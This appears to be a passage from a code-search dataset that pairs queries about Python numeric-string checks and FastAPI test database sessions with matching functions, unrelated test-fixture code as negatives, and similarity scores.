try:\n float(s)\n return True\n except ValueError:\n return False", "def is_numeric(self) -> bool:\n return False", "def isfloat(string:str) -> bool:\n try:\n float(string)\n return True\n except ValueError:\n return False", "def isfloat(string):\n try:\n float(string)\n return True\n except ValueError:\n return False", "def isint(s):\n try:\n x = int(s)\n return True\n except:\n return False", "def is_float(string: str) -> bool:\n try:\n float(string)\n return True\n except ValueError:\n return False", "def is_float(string):\n try:\n float(string)\n return True\n except ValueError:\n return False", "def _isnumber_with_thousands_separator(string):\n try:\n string = string.decode()\n except (UnicodeDecodeError, AttributeError):\n pass\n\n return bool(re.match(_float_with_thousands_separators, string))", "def is_float(string):\n try:\n float(string)\n return True\n except ValueError:\n return False", "def _is_number(self, symbol):\n if symbol.type == self.scanner.NUMBER:\n return True\n else:\n return False", "def is_number(G):\n return True", "def hasNumbers(inputString):\n return any(char.isdigit() for char in inputString)", "def isnumeric(a):\n if not _is_unicode(a):\n raise TypeError(\"isnumeric is only available for Unicode strings and arrays\")\n return _vec_string(a, bool_, 'isnumeric')", "def is_float(string):\n try:\n return float(string)\n except ValueError:\n return False", "def is_numeric(space, w_obj):\n if w_obj.tp in [space.tp_float, space.tp_int]:\n return space.w_True\n if w_obj.tp == space.tp_str:\n return space.newbool(w_obj.is_really_valid_number(space))\n return space.w_False", "def is_number_char(c: str) -> bool:\n return c.isdigit() or c == \".\"", "def represents_int(s):\n 
try:\n int(s)\n return True\n except ValueError:\n return False", "def is_number(value):\n try:\n float(value.replace(',', ''))\n except ValueError:\n return False\n return True", "def is_valid_decimal(string: str) -> bool:\n try:\n float(string)\n except ValueError:\n return False\n else:\n return True", "def isInt(string):\n try: int(string)\n except ValueError: return 0\n else: return 1", "def is_number(self, value):\n if isinstance(value, (int, float, long, complex)): # noqa\n return True\n return False", "def slug_is_numerical(slug):\r\n try:\r\n float(slug)\r\n except ValueError:\r\n return False\r\n\r\n return True", "def isNumber(txt):\r\n if not isinstance(txt, str) or len(txt)==0:\r\n return \"error: isNumber\"\r\n # --- YOU CODE STARTS HERE\r\n else: \r\n try: \r\n m = float(txt)\r\n return True\r\n except ValueError: \r\n return False" ]
[ "0.8850884", "0.8807396", "0.87623763", "0.87143797", "0.86495125", "0.86369324", "0.8611852", "0.8602863", "0.85868895", "0.8556723", "0.8540039", "0.846474", "0.83899784", "0.83504224", "0.82912153", "0.8217023", "0.81620115", "0.81181717", "0.8040893", "0.8037833", "0.8027394", "0.80194235", "0.7995083", "0.799109", "0.7920119", "0.78781044", "0.7837806", "0.7820823", "0.78159165", "0.7813508", "0.78091305", "0.7798515", "0.7791748", "0.7769569", "0.77473253", "0.7735177", "0.77194065", "0.770347", "0.7695527", "0.7686505", "0.7672379", "0.76521534", "0.7648834", "0.7648834", "0.76311475", "0.7630661", "0.7627648", "0.7626045", "0.7618389", "0.7613843", "0.7612315", "0.7611695", "0.7607591", "0.75929785", "0.7577857", "0.7571311", "0.75650424", "0.7544545", "0.75407887", "0.7534774", "0.7534169", "0.75090873", "0.7489672", "0.7479877", "0.74765104", "0.74717206", "0.7460645", "0.74596334", "0.7438914", "0.7429114", "0.7427089", "0.7399662", "0.7392259", "0.7384482", "0.7383222", "0.7361936", "0.7343039", "0.7326502", "0.731788", "0.73169464", "0.7305423", "0.73012096", "0.7282405", "0.72775877", "0.72748905", "0.7268661", "0.72534895", "0.72485024", "0.72460884", "0.72455066", "0.72232634", "0.7219982", "0.7207299", "0.71819943", "0.71562195", "0.71551806", "0.7149046", "0.71479934" ]
0.8597067
10
For some reason, app.dependency_overrides does not accept pytest fixtures as overrides, so this function is needed although it is exactly the same as db
def testing_get_db() -> Generator: db = TestSessionLocal() try: yield db finally: db.close()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def fixtures():", "def fixture_example_data():\n import_example_data()", "def _fixture_setup(self):\n pass", "def db_python_only():\n return os.path.join(_here, 'fixtures/databases/db-python-only/database')", "def load_initial_fixtures_func(app_name):\n return partial(_load_initial_fixtures_impl, app_name)", "def setUpFixture(self):\n pass", "def setUpBeforeMigration(self, apps):\n pass", "def add_fixtures(ctest):\n\n def test_setup(funct):\n \"\"\"Test setUp decorator to add fixture reloading.\"\"\"\n\n def decorated_setup():\n \"\"\"Decorated test setup.\"\"\"\n testdb.reload_db()\n funct()\n return decorated_setup\n\n for test in ctest._tests:\n test.setUp = test_setup(test.setUp)", "def setup_before_migration(self, apps):", "def setUpClass(cls):\n super(ExistingDataSourceTest, cls).setUpClass()\n django.setup()", "def setUpClass(cls):\n super(ExistingDataTest, cls).setUpClass()\n django.setup()", "def _pre_setup(self):\n apps.clear_cache()\n call_command('migrate', interactive=False, verbosity=0)\n call_command('loaddata', 'initial_data', verbosity=0)\n super(DatatableViewTestCase, self)._pre_setup()", "def test_setup(funct):\n\n def decorated_setup():\n \"\"\"Decorated test setup.\"\"\"\n testdb.reload_db()\n funct()\n return decorated_setup", "def db_available(test):\n from bob.io.base.test_utils import datafile\n from nose.plugins.skip import SkipTest\n import functools\n\n @functools.wraps(test)\n def wrapper(*args, **kwargs):\n dbfile = datafile(\"db.sql3\", __name__, None)\n if os.path.exists(dbfile):\n return test(*args, **kwargs)\n else:\n raise SkipTest(\n \"The database file '%s' is not available; did you forget to run 'bob_dbmanage.py %s create' ?\" % (\n dbfile, 'avspoof'))\n\n return wrapper", "def patch_mongo(monkeypatch):\n mock_db = mongomock.MongoClient().todo_database\n\n def fake_get_db():\n return mock_db\n\n monkeypatch.setattr(main.data_access, \"get_db\", fake_get_db)", "def setUp_extra(self):\n pass", "def post_migrations(self):", "def requires_database(func):\n def decorated(*args, **kwargs):\n if template_conn.closed:\n raise SkipTest(\"Database connection closed\")\n\n original_db_uri = app.config['SQLALCHEMY_DATABASE_URI']\n app.config['SQLALCHEMY_DATABASE_URI'] = db_uri_for('afcon_test')\n\n try:\n reset_db()\n except ProgrammingError as e:\n raise SkipTest(\"Database could not be created\")\n\n # Avoid circular reference\n from afcon.manager import manager\n manager.handle(sys.argv[0], ['db', 'upgrade'])\n\n rv = func(*args, **kwargs)\n\n # Reset DB URI\n app.config['SQLALCHEMY_DATABASE_URI'] = original_db_uri\n\n return rv\n\n return decorated", "def initialize_test_db(self):\n # Create a test database and sync it with models.py\n # Handle a second test database for selenium use. 
Postgres uses\n # transactions which interfere with the Django server thread.\n settings.TEST_DATABASE_NAME = self.db_name\n connection.creation.create_test_db(verbosity=self.verbosity,\n autoclobber=True)\n # Hook for doing any extra initialization\n self.extra_init()\n # Load fixture data.\n call_command('loaddata', *self.fixtures, verbosity=self.verbosity)\n # Sync data and close connection\n connection.close()\n # If sqlite3 or Postgres is used, create a backup database to speed up\n # fixture reloading.\n if settings.DATABASE_ENGINE == 'postgresql_psycopg2':\n # connection.creation is used to overcome transaction management,\n # allowing to execute DROP and CREATE db commands.\n cursor = connection.cursor()\n connection.creation.set_autocommit()\n cursor.execute(\"DROP DATABASE IF EXISTS %s_backup\" % self.db_name)\n cursor.execute(\"CREATE DATABASE %s_backup WITH TEMPLATE %s\" % (\n self.db_name, self.db_name))\n if settings.DATABASE_ENGINE == 'sqlite3':\n self.db_path = os.path.join(PROJECT_PATH, settings.DATABASE_NAME)\n self.db_backup_path = '%s_backup' % self.db_path\n if self.db_path[-3:] == '.db':\n self.db_backup_path = '%s_backup.db' % self.db_path[:-3]\n shutil.copyfile(self.db_path, self.db_backup_path)\n # Restore the database names as create_test_db changed it.\n settings.TEST_DATABASE_NAME = self.test_database_name\n settings.DATABASE_NAME = self.database_name", "def setUp(self):\n self.app = load_app(self.application_under_test)\n\n try:\n teardown_db()\n except Exception as e:\n print('-> err ({})'.format(e.__str__()))\n\n setup_app(section_name=self.application_under_test)\n setup_db()\n\n fixtures_loader = FixturesLoader([BaseFixture]) # BaseFixture is already loaded in bootstrap\n fixtures_loader.loads(self.fixtures)", "def setUp(self):\n self.app = Flask(__name__)\n db.init_app(self.app)\n with self.app.app_context():\n db.create_all()\n self.populate_db() # Your function that adds test data.", "def stub_blueprint_populate_autouse(stub_blueprint_populate: None) -> None:", "def stub_blueprint_populate_autouse(stub_blueprint_populate: None) -> None:", "def setUp(self):\n self.database = Mock()", "def monkeypatch_connections(self):\n \n def create_test_db(self, verbosity=1, autoclobber=False):\n \"\"\"\n Creates a test database, prompting the user for confirmation if the\n database already exists. Returns the name of the test database created.\n \"\"\"\n # Don't import django.core.management if it isn't needed.\n test_database_name = self._get_test_db_name()\n \n if self.connection.settings_dict.get('ENGINE', '').endswith('.sqlite3')\\\n and test_database_name != ':memory:':\n if os.access(test_database_name, os.F_OK):\n print \"sqlite test database found !\"\n \n #self._create_test_db(verbosity, autoclobber)\n \n self.connection.close()\n self.connection.settings_dict[\"NAME\"] = test_database_name\n \n # Confirm the feature set of the test database\n self.connection.features.confirm()\n \n # Get a cursor (even though we don't need one yet). 
This has\n # the side effect of initializing the test database.\n self.connection.cursor()\n\n return test_database_name\n \n def destroy_test_db(self, old_database_name, verbosity=1):\n \"\"\"\n Destroy a test database, prompting the user for confirmation if the\n database already exists.\n \"\"\"\n self.connection.close()\n test_database_name = self.connection.settings_dict['NAME']\n if verbosity >= 1:\n test_db_repr = ''\n if verbosity >= 2:\n test_db_repr = \" ('%s')\" % test_database_name\n print \"Ignore the test database for alias '%s'%s...\" % (\n self.connection.alias, test_db_repr)\n \n # Temporarily use a new connection and a copy of the settings dict.\n # This prevents the production database from being exposed to potential\n # child threads while (or after) the test database is destroyed.\n # Refs #10868 and #17786.\n settings_dict = self.connection.settings_dict.copy()\n settings_dict['NAME'] = old_database_name \n \n def _destroy_test_db(self, test_database_name, verbosity):\n print \"Keep the test database !\" #%test_database_name\n self.connection.close()\n \n \n for alias in connections:\n \"\"\"\n django.test.simple.DjangoTestSuiteRunner\n django.db.backends.creation\n django.db.backends.mysql.base\n \"\"\"\n connection = connections[alias]\n #if connection.settings_dict.get('ENGINE', '').endswith('.sqlite3'):\n \n if not self.options['setupdbs']:\n f1 = types.MethodType(create_test_db, connection.creation, DatabaseCreation)\n connection.creation.create_test_db = f1\n \n if not self.options['teardowndbs']:\n f2 = types.MethodType(destroy_test_db, connection.creation, DatabaseCreation)\n connection.creation.destroy_test_db = f2", "def db_path_with_improper_files():\n return os.path.join(_here, 'fixtures/databases/db-improper/database')", "def fixture_sequence_ctx(sequence_db: Manager) -> Dict[str, Manager]:\n return {\"db\": sequence_db}", "def db_type(pytestconfig, request):\n if pytestconfig.getoption(\"--mongodb\"):\n pytest.skip(\"ephemeraldb tests disabled\")\n yield \"ephemeraldb\"", "def patch_driver(db, monkeypatch):\n monkeypatch.setattr(\n \"fence.scripting.fence_create.get_SQLAlchemyDriver\", lambda _: db\n )", "def pytest_configure():\n exec(open(\"script/generate_sql\").read())", "def setUp(self):\n\n fq_dataset_name = self.fq_table_names[0].split('.')\n self.fq_dataset_name = '.'.join(fq_dataset_name[:-1])\n\n fq_sandbox_name = self.fq_sandbox_table_names[0].split('.')\n self.fq_sandbox_name = '.'.join(fq_sandbox_name[:-1])\n\n super().setUp()", "def app_factory(monkeypatch):\n\n created_app_envs = []\n\n def _app_factory():\n\n # create a temporary file to isolate the database for each test\n\n LOG.info(\"Creating test app ... 
\")\n\n # create the app with common test config\n db_fd, db_path = tempfile.mkstemp()\n tmp_work_dir = tempfile.TemporaryDirectory(\n prefix='pytest-bio3dbeacon-')\n\n config = bio3dbeacon.config.TestingConfig()\n config.WORK_DIR = tmp_work_dir.name\n\n # for the duration of this test, always return this app on 'create_app'\n original_create_app = bio3dbeacon.app.create_app\n _app = original_create_app(config=config)\n\n def mock_create_app(*args, **kwargs):\n LOG.warning('Using mocked create_app')\n return _app\n\n LOG.info(\"Applying monkeypatch for create_app ...\")\n monkeypatch.setattr(bio3dbeacon.app, 'create_app', mock_create_app)\n\n LOG.debug(\"APP: db_path = %s\", db_path)\n\n _app.config['SQLALCHEMY_DATABASE_URI'] = f'sqlite:///{db_path}'\n\n # create the database and load test data\n with _app.app_context():\n LOG.debug(\"Initialising test database ... \")\n bio3dbeacon.database.init_db()\n # get_db().executescript(_data_sql)\n\n created_app_envs.append({\n 'app': _app,\n 'db_fd': db_fd,\n 'db_path': db_path,\n 'work_dir': tmp_work_dir,\n })\n\n return _app\n\n yield _app_factory\n\n for app_env in created_app_envs:\n LOG.info(\"Cleaning up test app ...\")\n # close and remove the temporary database\n os.close(app_env['db_fd'])\n os.unlink(app_env['db_path'])\n app_env['work_dir'].cleanup()", "def populate_fixtures():\n languages()\n words()", "def _fixture(\n self,\n dialect_name,\n exception,\n db_stays_down,\n is_disconnect=True,\n ):\n connect_args = {}\n patchers = []\n db_disconnected = False\n\n class DisconnectCursorMixin:\n def execute(self, *arg, **kw):\n if db_disconnected:\n raise exception\n else:\n return super().execute(*arg, **kw)\n\n if dialect_name == \"postgresql\":\n import psycopg2.extensions\n\n class Curs(DisconnectCursorMixin, psycopg2.extensions.cursor):\n pass\n\n connect_args = {\"cursor_factory\": Curs}\n\n elif dialect_name == \"mysql\":\n import pymysql\n\n def fake_ping(self, *arg, **kw):\n if db_disconnected:\n raise exception\n else:\n return True\n\n class Curs(DisconnectCursorMixin, pymysql.cursors.Cursor):\n pass\n\n connect_args = {\"cursorclass\": Curs}\n\n patchers.append(\n mock.patch.object(\n pymysql.Connection, \"ping\", fake_ping\n )\n )\n else:\n raise NotImplementedError()\n\n with mock.patch.object(\n compat,\n \"native_pre_ping_event_support\",\n self.native_pre_ping,\n ):\n engine = engines.create_engine(\n self.engine.url, max_retries=0)\n\n # 1. override how we connect. if we want the DB to be down\n # for the moment, but recover, reset db_disconnected after\n # connect is called. If we want the DB to stay down, then\n # make sure connect raises the error also.\n @event.listens_for(engine, \"do_connect\")\n def _connect(dialect, connrec, cargs, cparams):\n nonlocal db_disconnected\n\n # while we're here, add our cursor classes to the DBAPI\n # connect args\n cparams.update(connect_args)\n\n if db_disconnected:\n if db_stays_down:\n raise exception\n else:\n db_disconnected = False\n\n # 2. initialize the dialect with a first connect\n conn = engine.connect()\n conn.close()\n\n # 3. 
add additional patchers\n patchers.extend([\n mock.patch.object(\n engine.dialect.dbapi,\n \"Error\",\n self.Error,\n ),\n mock.patch.object(\n engine.dialect,\n \"is_disconnect\",\n mock.Mock(return_value=is_disconnect),\n ),\n ])\n\n with test_utils.nested(*patchers):\n # \"disconnect\" the DB\n db_disconnected = True\n yield engine", "def test_twice_dependent_object_import(self):\n pass", "def setUp(self):\n self.data = DatabaseIntermediary()", "def setUp(self):\n init_db()\n self.client = Client(schema)", "def setUp(self):\n self.fixtures_path = os.path.join(\n os.path.dirname(os.path.abspath(__file__)), \"fixtures/\"\n )", "def setUp(self):\n self.app = create_app()\n self.client = self.app.test_client\n self.database_name = \"trivia_test\"\n #self.database_path = \"postgres://{}/{}\".format('localhost:5432', self.database_name)\n self.database_path = 'postgresql+psycopg2://{}:{}@{}/{}'.format('postgres','picasso0', 'localhost:5432', self.database_name)\n setup_db(self.app, self.database_path)\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()", "def setUp(self):\n super().setUp()\n self.direct_dependency = \"laravel-mix@4.0.16\"\n self.direct_dependency_key = Entity.safe_entity_key(self.direct_dependency)\n self.direct_dependency_path = [\"package.json@*\", self.direct_dependency]\n self.vulnerabilities_json = {\n \"vulnerabilities\": [\n {\n \"id\": \"SNYK-JS-ACORN-559469\",\n \"severity\": \"low\",\n \"from\": [*self.direct_dependency_path, \"webpack@4.41.4\", \"acorn@6.4.0\"],\n },\n ],\n }\n self.expected_entity = {\n \"key\": self.direct_dependency_key,\n \"dependency\": self.direct_dependency,\n \"nr_vulnerabilities\": 1,\n \"example_vulnerability\": \"SNYK-JS-ACORN-559469\",\n \"url\": \"https://snyk.io/vuln/SNYK-JS-ACORN-559469\",\n \"example_path\": \"package.json@* ➜ laravel-mix@4.0.16 ➜ webpack@4.41.4 ➜ acorn@6.4.0\",\n \"highest_severity\": \"low\",\n }", "def electrolytedb():\n if not check_for_mongodb():\n pytest.skip(\"MongoDB is required\")", "def setUp(self):\n self.test_data = MockPyMySqlDataSource().load()", "def fixtures():\n temp_path = os.path.join(os.path.dirname(__file__), 'temp')\n demo_files_path = os.path.join(os.path.dirname(__file__), 'demo_files')\n\n # Create location\n loc = Location(name='local', uri=temp_path, default=True)\n db.session.add(loc)\n db.session.commit()\n\n # Example files from the data folder\n demo_files = (\n 'markdown.md',\n 'csvfile.csv',\n 'zipfile.zip',\n 'jsonfile.json',\n 'xmlfile.xml',\n 'notebook.ipynb',\n 'jpgfile.jpg',\n 'pngfile.png',\n )\n\n rec_uuid = uuid4()\n provider = RecordIdProvider.create(object_type='rec', object_uuid=rec_uuid)\n data = {\n 'pid_value': provider.pid.pid_value,\n }\n\n record = Record.create(data, id_=rec_uuid)\n bucket = Bucket.create()\n RecordsBuckets.create(record=record.model, bucket=bucket)\n\n # Add files to the record\n for f in demo_files:\n with open(os.path.join(demo_files_path, f), 'rb') as fp:\n record.files[f] = fp\n\n record.files.flush()\n record.commit()\n db.session.commit()", "def setUp(self):\n self.app = api.app\n self.client = self.app.test_client\n \n setup_db(self.app)\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)", "async def test_dependent_fixture(dependent_fixture):\n await asyncio.sleep(0.1)", "def setUp(self):\n super().setUp()\n 
Tenant.objects.get_or_create(schema_name=\"public\")", "def test_setup_applies_patches(self):\n manager_inits = self.get_manager_inits()\n persistence_helper = PersistenceHelper()\n self.assertEqual(persistence_helper._patches_applied, False)\n self.assertEqual(manager_inits, self.get_manager_inits())\n\n self.assertEqual(persistence_helper.setup(), None)\n self.assertEqual(persistence_helper._patches_applied, True)\n self.assertNotEqual(manager_inits, self.get_manager_inits())\n\n # Clean up after ourselves.\n persistence_helper._unpatch()\n self.assertEqual(persistence_helper._patches_applied, False)\n self.assertEqual(manager_inits, self.get_manager_inits())", "def setUpTestData(cls):\n call_command('loaddata', 'db.json', verbosity=0)", "def mongo_fixture(scope='function', versions=['latest'], data=None,\n restore=None, reuse=True, replicaset=None, port=27017,\n client_args=None):\n\n # parallelized start of different versions\n if reuse:\n for version in versions:\n ensure_service(version, replicaset, port, client_args)\n\n @pytest.fixture(scope=scope, params=versions)\n def mongo(request):\n if reuse:\n service = get_service(request.param)\n else:\n service = dockerdb.service.Mongo(request.param, wait=True,\n replicaset=replicaset,\n exposed_port=port,\n client_args=client_args)\n\n client = service.pymongo_client()\n service.wait()\n\n if data:\n insert_data(client, data)\n\n if restore:\n mongorestore(service, restore)\n\n yield service\n\n if not reuse:\n service.remove()\n\n return mongo", "def setUp(self):\n super().setUp()\n self.database.datamodels.find_one.return_value = self.DATA_MODEL", "def test_blogpost_belongs_to_app(self):\r\n self.configure_fixtures()\r\n blogpost = Blogpost(title='title', body=\"body\", app=None)", "def setup_fixtures(func):\n func = pytest.mark.usefixtures('smtp', 'mock_access_request', 'dummy_access_request')(func)\n func = pytest.mark.parametrize('mock_access_request',\n [{\n 'during_registration': True,\n 'during_registration_required': True,\n 'personal_data': PERSONAL_DATA\n }],\n indirect=True)(func)\n return func", "def setup_fixtures(func):\n func = pytest.mark.usefixtures('smtp', 'mock_access_request', 'dummy_access_request')(func)\n func = pytest.mark.parametrize('mock_access_request',\n [{\n 'during_registration': True,\n 'during_registration_required': True,\n 'personal_data': PERSONAL_DATA\n }],\n indirect=True)(func)\n return func", "def pytest_fixture_setup(fixturedef):\n if isasyncgenfunction(fixturedef.func):\n func = fixturedef.func\n\n strip_request = False\n if 'request' not in fixturedef.argnames:\n fixturedef.argnames += ('request',)\n strip_request = True\n\n def wrapper(*args, **kwargs):\n request = kwargs['request']\n\n if strip_request:\n del kwargs['request']\n\n if 'loop' not in request.fixturenames:\n raise Exception(\n \"Asynchronous fixtures must depend on the 'loop' fixture or \"\n \"be used in tests depending from it.\"\n )\n\n loop = request.getfixturevalue('loop')\n # for async generators, we need to advance the generator once,\n # then advance it again in a finalizer\n gen = func(*args, **kwargs)\n\n def finalizer():\n try:\n return loop.run_until_complete(gen.__anext__())\n except StopAsyncIteration: # NOQA\n pass\n\n request.addfinalizer(finalizer)\n return loop.run_until_complete(gen.__anext__())\n\n fixturedef.func = wrapper\n\n elif asyncio.iscoroutinefunction(fixturedef.func):\n func = fixturedef.func\n\n strip_request = False\n if 'request' not in fixturedef.argnames:\n fixturedef.argnames += ('request',)\n 
strip_request = True\n\n def wrapper(*args, **kwargs):\n request = kwargs['request']\n if 'loop' not in request.fixturenames:\n raise Exception(\n \"Asynchronous fixtures must depend on the 'loop' fixture or \"\n \"be used in tests depending from it.\"\n )\n\n loop = request.getfixturevalue('loop')\n\n if strip_request:\n del kwargs['request']\n\n return loop.run_until_complete(func(*args, **kwargs))\n\n fixturedef.func = wrapper\n\n else:\n return", "def setUpTestData(cls):\n cls.emulate_off_api_manager_categories()\n cls.emulate_off_api_manager_products()\n cls.db_manager = Command()", "def setUp(self):\n test_helpers.patch_environ(self)\n\n data = []\n\n strategy1 = data_types.FuzzStrategyProbability()\n strategy1.strategy_name = 'fork,corpus_subset,'\n strategy1.probability = 0.33\n strategy1.engine = 'libFuzzer'\n data.append(strategy1)\n\n strategy2 = data_types.FuzzStrategyProbability()\n strategy2.strategy_name = 'random_max_len,value_profile,'\n strategy2.probability = 0.34\n strategy2.engine = 'libFuzzer'\n data.append(strategy2)\n ndb.put_multi(data)\n\n distribution = fuzz_task.get_strategy_distribution_from_ndb()\n\n environment.set_value('USE_BANDIT_STRATEGY_SELECTION', True)\n environment.set_value('STRATEGY_SELECTION_DISTRIBUTION', distribution)", "def test_golden_path_sql_datasource_configuration(\n mock_emit,\n caplog,\n empty_data_context_stats_enabled,\n sa,\n test_connectable_postgresql_db,\n):\n context: DataContext = empty_data_context_stats_enabled\n\n with set_directory(context.root_directory):\n # Everything below this line (except for asserts) is what we expect users to run as part of the golden path.\n import great_expectations as gx\n\n context = gx.get_context()\n\n db_hostname = os.getenv(\"GE_TEST_LOCAL_DB_HOSTNAME\", \"localhost\")\n yaml_config = f\"\"\"\n class_name: SimpleSqlalchemyDatasource\n credentials:\n drivername: postgresql\n username: postgres\n password: \"\"\n host: {db_hostname}\n port: 5432\n database: test_ci\n\n introspection:\n whole_table_with_limits:\n sampling_method: _sample_using_limit\n sampling_kwargs:\n n: 10\n \"\"\"\n # noinspection PyUnusedLocal\n report_object = context.test_yaml_config(\n name=\"my_datasource\",\n yaml_config=yaml_config,\n return_mode=\"report_object\",\n )\n assert mock_emit.call_count == 2\n # Substitute anonymized names since it changes for each run\n anonymized_datasource_name = mock_emit.call_args_list[1][0][0][\"event_payload\"][\n \"anonymized_name\"\n ]\n anonymized_data_connector_name = mock_emit.call_args_list[1][0][0][\n \"event_payload\"\n ][\"anonymized_data_connectors\"][0][\"anonymized_name\"]\n expected_call_args_list = [\n mock.call(\n {\"event_payload\": {}, \"event\": \"data_context.__init__\", \"success\": True}\n ),\n mock.call(\n {\n \"event\": \"data_context.test_yaml_config\",\n \"event_payload\": {\n \"anonymized_name\": anonymized_datasource_name,\n \"parent_class\": \"SimpleSqlalchemyDatasource\",\n \"anonymized_execution_engine\": {\n \"parent_class\": \"SqlAlchemyExecutionEngine\"\n },\n \"anonymized_data_connectors\": [\n {\n \"anonymized_name\": anonymized_data_connector_name,\n \"parent_class\": \"InferredAssetSqlDataConnector\",\n }\n ],\n },\n \"success\": True,\n }\n ),\n ]\n assert mock_emit.call_args_list == expected_call_args_list\n\n print(json.dumps(report_object, indent=2))\n print(context.datasources)\n\n context.get_batch_list(\n \"my_datasource\",\n \"whole_table_with_limits\",\n \"test_df\",\n )\n # assert len(my_batch.data.fetchall()) == 10\n\n with 
pytest.raises(KeyError):\n context.get_batch_list(\n \"my_datasource\",\n \"whole_table_with_limits\",\n \"DOES_NOT_EXIST\",\n )\n\n my_validator = context.get_validator(\n datasource_name=\"my_datasource\",\n data_connector_name=\"whole_table_with_limits\",\n data_asset_name=\"test_df\",\n expectation_suite=ExpectationSuite(\n \"my_expectation_suite\", data_context=context\n ),\n )\n my_evr = my_validator.expect_table_columns_to_match_set(column_set=[])\n print(my_evr)\n\n # my_evr = my_validator.expect_column_values_to_be_between(\n # column=\"x\",\n # min_value=0,\n # max_value=4,\n # )\n # assert my_evr.success\n\n # TODO: <Alex>ALEX</Alex>\n # my_evr = my_validator.expect_table_columns_to_match_ordered_list(ordered_list=[\"a\", \"b\", \"c\"])\n # assert my_evr.success\n\n # Confirm that logs do not contain any exceptions or invalid messages\n assert not usage_stats_exceptions_exist(messages=caplog.messages)\n assert not usage_stats_invalid_messages_exist(messages=caplog.messages)", "def test_reload_if_needed(self):\n self.db.storage = MagicMock()\n self.db.storage.list.return_value = [make_package(factory=SQLPackage)]\n self.db.reload_if_needed()\n count = self.sql.query(SQLPackage).count()\n self.assertEqual(count, 1)", "def setUp(self):\n db.create_all()", "def test_pytest_passes(cookies, context_override):\n result = cookies.bake(extra_context=context_override)\n project_path = str(result.project_path)\n current_dir = os.getcwd()\n try:\n new_env = os.environ.copy()\n if context_override[\"use_database\"] == \"Yes\" and not new_env.get(\"SQLALCHEMY_DATABASE_URI\"):\n new_env[\"SQLALCHEMY_DATABASE_URI\"] = \"postgresql://postgres:mysecretpassword@localhost:5432/postgres\"\n os.chdir(project_path)\n subprocess.run(\"python3 -m venv venv_tmp \"\n \"&& source ./venv_tmp/bin/activate \"\n \"&& make test && \", shell=True, env=new_env)\n except Exception as e:\n pytest.fail(str(e))\n finally:\n os.chdir(current_dir)\n shutil.rmtree(project_path)", "def setUp(self):\n test_helpers.patch_environ(self)\n\n data = []\n\n strategy1 = data_types.FuzzStrategyProbability()\n strategy1.strategy_name = 'corpus_subset,'\n strategy1.probability = 0.33\n strategy1.engine = 'afl'\n data.append(strategy1)\n\n strategy2 = data_types.FuzzStrategyProbability()\n strategy2.strategy_name = 'corpus_mutations_radamsa,corpus_subset,'\n strategy2.probability = 0.34\n strategy2.engine = 'afl'\n data.append(strategy2)\n\n strategy3 = data_types.FuzzStrategyProbability()\n strategy3.strategy_name = 'corpus_subset,'\n strategy3.probability = 0.33\n strategy3.engine = 'afl'\n data.append(strategy3)\n ndb.put_multi(data)\n\n distribution = fuzz_task.get_strategy_distribution_from_ndb()\n\n environment.set_value('USE_BANDIT_STRATEGY_SELECTION', True)\n environment.set_value('STRATEGY_SELECTION_DISTRIBUTION', distribution)", "def setUp(self):\n\n app.config.from_object(config['testing'])\n db.create_all()", "def setUp(self):\n self.db_fd, app.app.config['DATABASE'] = tempfile.mkstemp()\n app.app.config['TESTING'] = True\n self.app = app.app.test_client()\n app.init_db()", "def setUp(self):\n self.app = app.test_client()\n db.init_db()", "def test_sync_incorrect_user_yaml_file(syncer, monkeypatch, db_session):\n path = os.path.join(\n os.path.dirname(os.path.realpath(__file__)), \"data/yaml/incorrect_user.yaml\"\n )\n monkeypatch.setattr(syncer, \"sync_from_local_yaml_file\", path)\n with pytest.raises(AssertionError):\n syncer.sync()\n assert syncer.arborist_client.create_resource.not_called()\n assert 
syncer.arborist_client.create_role.not_called()\n assert syncer.arborist_client.create_policy.not_called()", "def load_fixtures(self, dbname, table, data):\n db = self.databases[dbname]['db']\n db.execute('BEGIN')\n for row in data:\n columns = row.keys()\n q = db.Insert(table, cols=columns)\n db.execute(q, row)\n db.execute('COMMIT')", "def setUpClass(cls):\n super(AttachmentTest, cls).setUpClass()\n django.setup()", "def _pre_setup(self):\r\n\r\n # Flush the Mongo modulestore\r\n ModuleStoreTestCase.drop_mongo_collections()\r\n\r\n # Call superclass implementation\r\n super(ModuleStoreTestCase, self)._pre_setup()", "def test_fixtures(self):\n\n self.assertEqual(OrderType.objects.count(), 2,\n 'Incorrect order type count')\n self.assertEqual(Stock.objects.count(), 3,\n 'Incorrect stocks count')\n self.assertEqual(OrderStatus.objects.count(), 3,\n 'Incorrect statuses count')", "def initialize_test_env():\n async def do():\n c = Config()\n pool = await aiomysql.create_pool(\n host=c[\"DB_HOST\"],\n port=c[\"DB_PORT\"],\n user=c[\"DB_USERNAME\"],\n password=c[\"DB_PASSWORD\"],\n db=c[\"TEST_DB_NAME\"],\n cursorclass=aiomysql.DictCursor\n )\n async with pool.acquire() as conn:\n async with conn.cursor() as cur:\n await cur.execute(\n \"SELECT table_name AS n FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = %s\", (c[\"TEST_DB_NAME\"],)\n )\n tables = await cur.fetchall()\n await cur.execute(\"SET FOREIGN_KEY_CHECKS = 0\")\n for table in tables:\n await cur.execute(\"DROP TABLE {}\".format(table[\"n\"],))\n await cur.execute(\"SET FOREIGN_KEY_CHECKS = 1\")\n await conn.commit()\n\n await Migrator(pool).migrate()\n\n with open(\"./tests/additional.sql\", \"r\") as f:\n queries = f.read()\n\n async with pool.acquire() as conn:\n async with conn.cursor() as cur:\n await cur.execute(queries)\n await conn.commit()\n\n asyncio.get_event_loop().run_until_complete(do())", "def test_config():\n\n # assert create_app().testing\n assert create_app(\"testing\", settings={\n \"TESTING\": True,\n \"SQLALCHEMY_TRACK_MODIFICATIONS\": False\n }).testing", "def pytest_collection_modifyitems(config, items):\n execute_mssql_tests = ensure_mssql_ready_for_tests(config)\n skip_mssql = pytest.mark.skip(reason=\"requires SQL Server\")\n for item in items:\n if \"mssql\" in item.keywords:\n if execute_mssql_tests:\n # Add 'mssql_setup_and_teardown' as FIRST in fixture list\n fixtures = ['mssql_setup_and_teardown'] + item.fixturenames\n item.fixturenames = fixtures\n else:\n item.add_marker(skip_mssql)\n if \"http_server\" in item.keywords:\n item.fixturenames.append('http_server_setup_and_teardown')", "def test_db(app):\n assert 